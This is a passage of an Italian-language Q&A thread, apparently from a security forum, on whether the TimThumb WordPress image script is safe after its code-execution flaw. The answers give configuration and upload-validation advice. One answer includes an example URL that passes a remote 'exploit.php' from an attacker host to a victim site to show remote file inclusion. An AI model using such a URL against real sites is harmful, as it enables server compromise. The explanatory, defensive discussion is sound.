TimThumb alternativa di sicurezza o correzione?

Naviga le tue risposte
0

"Un'utilità di ridimensionamento delle immagini chiamata timthumb.php è ampiamente utilizzata da molti temi di WordPress .... L'utilità esegue solo una corrispondenza parziale sui nomi degli host che consente agli hacker di caricare ed eseguire codice PHP arbitrario nella directory della cache timthumb ... Inoltre ricristina in modo ricorsivo la directory e le sottodirectory di WordPress per la funzione base64_decode e controlla le lunghe stringhe codificate per verificare se sei stato compromesso. "

"NOTA: timthumb.php è intrinsecamente insicuro perché si basa sulla possibilità di scrivere file in una directory accessibile alle persone che visitano il tuo sito web." Source

I commenti dicono che con l'aggiornamento alla versione 2, diventa più difficile sfruttare il codice. Codice

Sembra che l'unica directory che richiede il permesso 777 sia la cache, a parte che tutte le cartelle / file dovrebbero essere il valore predefinito.

Ho aggiunto lo script al mio sito di code-igniter per il ridimensionamento delle immagini. Dovrei sentirmi al sicuro usando la sceneggiatura al momento, o dovrei cercare un'alternativa?

    
posta Rick Rhodes 05.02.2012 - 19:05
fonte

2 risposte

3

La versione aggiornata di timthumb ha molti meccanismi di sicurezza per prevenire tali vulnerabilità e il codice è stato ispezionato più attentamente dopo la scoperta. Lo uso personalmente su diversi siti e non penso che sia meno sicuro di qualsiasi altra alternativa. Tuttavia, ovviamente dipende dalle alternative e non ne sono a conoscenza in particolare.

Non ci sono garanzie per la sicurezza. C'è sempre la possibilità che venga scoperta una nuova vulnerabilità. Ma questo vale per qualsiasi prodotto. Tendo a pensare che i prodotti che hanno riscontrato un problema di sicurezza probabilmente tengano conto della sicurezza più di quelli che non hanno riscontrato problemi. Ovviamente è molto individuale per le persone, il prodotto, l'ambiente e così via, quindi non è qualcosa su cui fare affidamento.

Invece vorrei concentrarmi sull'impostazione di timthumb nel modo più sicuro possibile per il tuo ambiente. Ad esempio, assicurarsi che non siano consentite sorgenti di immagini esterne. In tali configurazioni, credo che persino la vecchia versione di timthumb non fosse vulnerabile.

    
risposta data 05.02.2012 - 21:04
fonte
1

Mi sembra che l'intero problema dei permessi sia un po 'falso. Questo script sembra consentire inclusioni di file remoti non filtrando correttamente le estensioni di file o permettendo ai file gif di essere caricati con il codice exploit aggiunto alla fine della gif (e forse anche nei dati exif).

Al di sopra della mia testa, quando permetti il caricamento, uno script dovrebbe verificare quanto segue:

  • Verifica i dati exif per l'inclusione del codice dannoso (ad esempio exif_read_data() )

  • Controlla le dimensioni dell'immagine e le dimensioni del file (per vedere se esistono anche)

  • Controlla almeno l'inizio e la fine del codice per l'inclusione dannosa,
  • Controlla il tipo di contenuto
  • È importante utilizzare una lista bianca delle estensioni di immagine consentite

I problemi di sicurezza sono a volte aggiunti accidentalmente dagli sviluppatori nello sforzo di rendere il caricamento delle immagini più flessibile per gli utenti. Ad esempio, per consentire il caricamento di avatar / immagini remotamente ospitate. Se non viene controllato correttamente, un utente malintenzionato può caricare un codice dannoso ad esempio in un file con estensione gif e tentare di includerlo da remoto.

O anche usando un'estensione .php standard a seconda di quanto sia scritto male il codice, per esempio teorico: 

www.victimsite.com/?remoteimg=http://www.attacksite.com/images/exploit.php/fakeimage.gif

Alcuni script leggeranno l'estensione dell'immagine come .gif ma quando include la cosiddetta immagine, il codice in realtà include i contenuti del file exploit.php.

    
risposta data 05.02.2012 - 21:11
fonte

Leggi altre domande sui tag

I codici di esportazione sono consentiti in DTLS 1.0? Che cos'è un attacco di collisione in termini semplici? [chiuso]